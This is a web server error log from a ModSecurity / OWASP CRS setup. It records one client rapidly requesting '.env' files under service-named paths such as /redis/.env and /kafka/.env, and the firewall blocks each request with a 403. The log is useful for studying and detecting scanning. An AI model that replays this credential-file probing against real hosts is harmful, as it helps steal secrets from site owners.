[Mon May 11 16:27:20.897479 2026] [security2:error] [pid 1411099:tid 1411119] [client 18.180.54.2:45986] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/mongodb/.env"] [unique_id "agHnSA-Qm4vhlWBPlMi6hQAAABM"]
[Mon May 11 16:27:21.061972 2026] [security2:error] [pid 1411055:tid 1411065] [client 18.180.54.2:45998] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /postgres/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/postgres/.env"] [unique_id "agHnSUWKUxpmnkK7zHx8fAAAAQg"]
[Mon May 11 16:27:21.062218 2026] [security2:error] [pid 1411055:tid 1411065] [client 18.180.54.2:45998] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/postgres/.env"] [unique_id "agHnSUWKUxpmnkK7zHx8fAAAAQg"]
[Mon May 11 16:27:21.062733 2026] [core:error] [pid 1411055:tid 1411065] [client 18.180.54.2:45998] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:21.062890 2026] [security2:error] [pid 1411055:tid 1411065] [client 18.180.54.2:45998] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/postgres/.env"] [unique_id "agHnSUWKUxpmnkK7zHx8fAAAAQg"]
[Mon May 11 16:27:21.599012 2026] [security2:error] [pid 1416109:tid 1416148] [client 18.180.54.2:46012] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /redis/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/redis/.env"] [unique_id "agHnSVV4kyjgo4bQBUhVCgAAANI"]
[Mon May 11 16:27:21.599231 2026] [security2:error] [pid 1416109:tid 1416148] [client 18.180.54.2:46012] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/redis/.env"] [unique_id "agHnSVV4kyjgo4bQBUhVCgAAANI"]
[Mon May 11 16:27:21.599751 2026] [core:error] [pid 1416109:tid 1416148] [client 18.180.54.2:46012] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:21.599911 2026] [security2:error] [pid 1416109:tid 1416148] [client 18.180.54.2:46012] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/redis/.env"] [unique_id "agHnSVV4kyjgo4bQBUhVCgAAANI"]
[Mon May 11 16:27:21.803680 2026] [security2:error] [pid 1412074:tid 1412081] [client 18.180.54.2:46014] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mongodb/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/mongodb/.env"] [unique_id "agHnSTJnyuKVXoStDha1cAAAAEU"]
[Mon May 11 16:27:21.803916 2026] [security2:error] [pid 1412074:tid 1412081] [client 18.180.54.2:46014] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/mongodb/.env"] [unique_id "agHnSTJnyuKVXoStDha1cAAAAEU"]
[Mon May 11 16:27:21.804409 2026] [core:error] [pid 1412074:tid 1412081] [client 18.180.54.2:46014] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:21.804567 2026] [security2:error] [pid 1412074:tid 1412081] [client 18.180.54.2:46014] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/mongodb/.env"] [unique_id "agHnSTJnyuKVXoStDha1cAAAAEU"]
[Mon May 11 16:27:22.326233 2026] [security2:error] [pid 1411099:tid 1411103] [client 18.180.54.2:46028] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /elasticsearch/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/elasticsearch/.env"] [unique_id "agHnSg-Qm4vhlWBPlMi6igAAAAI"]
[Mon May 11 16:27:22.326460 2026] [security2:error] [pid 1411099:tid 1411103] [client 18.180.54.2:46028] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/elasticsearch/.env"] [unique_id "agHnSg-Qm4vhlWBPlMi6igAAAAI"]
[Mon May 11 16:27:22.327094 2026] [core:error] [pid 1411099:tid 1411103] [client 18.180.54.2:46028] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:22.327260 2026] [security2:error] [pid 1411099:tid 1411103] [client 18.180.54.2:46028] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/elasticsearch/.env"] [unique_id "agHnSg-Qm4vhlWBPlMi6igAAAAI"]
[Mon May 11 16:27:22.537340 2026] [security2:error] [pid 1416109:tid 1416150] [client 18.180.54.2:46032] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /redis/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/redis/.env"] [unique_id "agHnSlV4kyjgo4bQBUhVEAAAANQ"]
[Mon May 11 16:27:22.537562 2026] [security2:error] [pid 1416109:tid 1416150] [client 18.180.54.2:46032] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/redis/.env"] [unique_id "agHnSlV4kyjgo4bQBUhVEAAAANQ"]
[Mon May 11 16:27:22.538090 2026] [core:error] [pid 1416109:tid 1416150] [client 18.180.54.2:46032] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:22.538268 2026] [security2:error] [pid 1416109:tid 1416150] [client 18.180.54.2:46032] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/redis/.env"] [unique_id "agHnSlV4kyjgo4bQBUhVEAAAANQ"]
[Mon May 11 16:27:23.029535 2026] [security2:error] [pid 1411099:tid 1411121] [client 18.180.54.2:46048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /rabbitmq/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/rabbitmq/.env"] [unique_id "agHnSw-Qm4vhlWBPlMi6lQAAABU"]
[Mon May 11 16:27:23.029765 2026] [security2:error] [pid 1411099:tid 1411121] [client 18.180.54.2:46048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/rabbitmq/.env"] [unique_id "agHnSw-Qm4vhlWBPlMi6lQAAABU"]
[Mon May 11 16:27:23.030332 2026] [core:error] [pid 1411099:tid 1411121] [client 18.180.54.2:46048] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:23.030838 2026] [security2:error] [pid 1411099:tid 1411121] [client 18.180.54.2:46048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/rabbitmq/.env"] [unique_id "agHnSw-Qm4vhlWBPlMi6lQAAABU"]
[Mon May 11 16:27:23.275190 2026] [security2:error] [pid 1411201:tid 1411269] [client 18.180.54.2:46052] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /elasticsearch/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/elasticsearch/.env"] [unique_id "agHnS_y_GXSWIKeli0vyzgAAAJg"]
[Mon May 11 16:27:23.275426 2026] [security2:error] [pid 1411201:tid 1411269] [client 18.180.54.2:46052] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/elasticsearch/.env"] [unique_id "agHnS_y_GXSWIKeli0vyzgAAAJg"]
[Mon May 11 16:27:23.275952 2026] [core:error] [pid 1411201:tid 1411269] [client 18.180.54.2:46052] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:23.276126 2026] [security2:error] [pid 1411201:tid 1411269] [client 18.180.54.2:46052] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/elasticsearch/.env"] [unique_id "agHnS_y_GXSWIKeli0vyzgAAAJg"]
[Mon May 11 16:27:23.752679 2026] [security2:error] [pid 1411055:tid 1411059] [client 18.180.54.2:46068] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /kafka/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/kafka/.env"] [unique_id "agHnS0WKUxpmnkK7zHx8igAAAQI"]
[Mon May 11 16:27:23.752907 2026] [security2:error] [pid 1411055:tid 1411059] [client 18.180.54.2:46068] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/kafka/.env"] [unique_id "agHnS0WKUxpmnkK7zHx8igAAAQI"]
[Mon May 11 16:27:23.753626 2026] [core:error] [pid 1411055:tid 1411059] [client 18.180.54.2:46068] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:23.753870 2026] [security2:error] [pid 1411055:tid 1411059] [client 18.180.54.2:46068] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/kafka/.env"] [unique_id "agHnS0WKUxpmnkK7zHx8igAAAQI"]
[Mon May 11 16:27:23.977583 2026] [security2:error] [pid 1411099:tid 1411107] [client 18.180.54.2:46080] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /rabbitmq/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/rabbitmq/.env"] [unique_id "agHnSw-Qm4vhlWBPlMi6lgAAAAY"]
[Mon May 11 16:27:23.977808 2026] [security2:error] [pid 1411099:tid 1411107] [client 18.180.54.2:46080] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/rabbitmq/.env"] [unique_id "agHnSw-Qm4vhlWBPlMi6lgAAAAY"]
[Mon May 11 16:27:23.978354 2026] [core:error] [pid 1411099:tid 1411107] [client 18.180.54.2:46080] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:23.978511 2026] [security2:error] [pid 1411099:tid 1411107] [client 18.180.54.2:46080] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/rabbitmq/.env"] [unique_id "agHnSw-Qm4vhlWBPlMi6lgAAAAY"]
[Mon May 11 16:27:24.498771 2026] [security2:error] [pid 1411201:tid 1411259] [client 18.180.54.2:46096] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /queue/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/queue/.env"] [unique_id "agHnTPy_GXSWIKeli0vy0AAAAI0"]
[Mon May 11 16:27:24.499003 2026] [security2:error] [pid 1411201:tid 1411259] [client 18.180.54.2:46096] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/queue/.env"] [unique_id "agHnTPy_GXSWIKeli0vy0AAAAI0"]
[Mon May 11 16:27:24.499541 2026] [core:error] [pid 1411201:tid 1411259] [client 18.180.54.2:46096] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:24.499707 2026] [security2:error] [pid 1411201:tid 1411259] [client 18.180.54.2:46096] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/queue/.env"] [unique_id "agHnTPy_GXSWIKeli0vy0AAAAI0"]
[Mon May 11 16:27:24.658508 2026] [security2:error] [pid 1411055:tid 1411069] [client 18.180.54.2:46098] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /kafka/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/kafka/.env"] [unique_id "agHnTEWKUxpmnkK7zHx8jQAAAQw"]
[Mon May 11 16:27:24.658739 2026] [security2:error] [pid 1411055:tid 1411069] [client 18.180.54.2:46098] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/kafka/.env"] [unique_id "agHnTEWKUxpmnkK7zHx8jQAAAQw"]
[Mon May 11 16:27:24.659324 2026] [core:error] [pid 1411055:tid 1411069] [client 18.180.54.2:46098] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:24.659480 2026] [security2:error] [pid 1411055:tid 1411069] [client 18.180.54.2:46098] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/kafka/.env"] [unique_id "agHnTEWKUxpmnkK7zHx8jQAAAQw"]
[Mon May 11 16:27:25.239010 2026] [security2:error] [pid 1411201:tid 1411261] [client 18.180.54.2:46114] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /worker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/worker/.env"] [unique_id "agHnTfy_GXSWIKeli0vy0QAAAI8"]
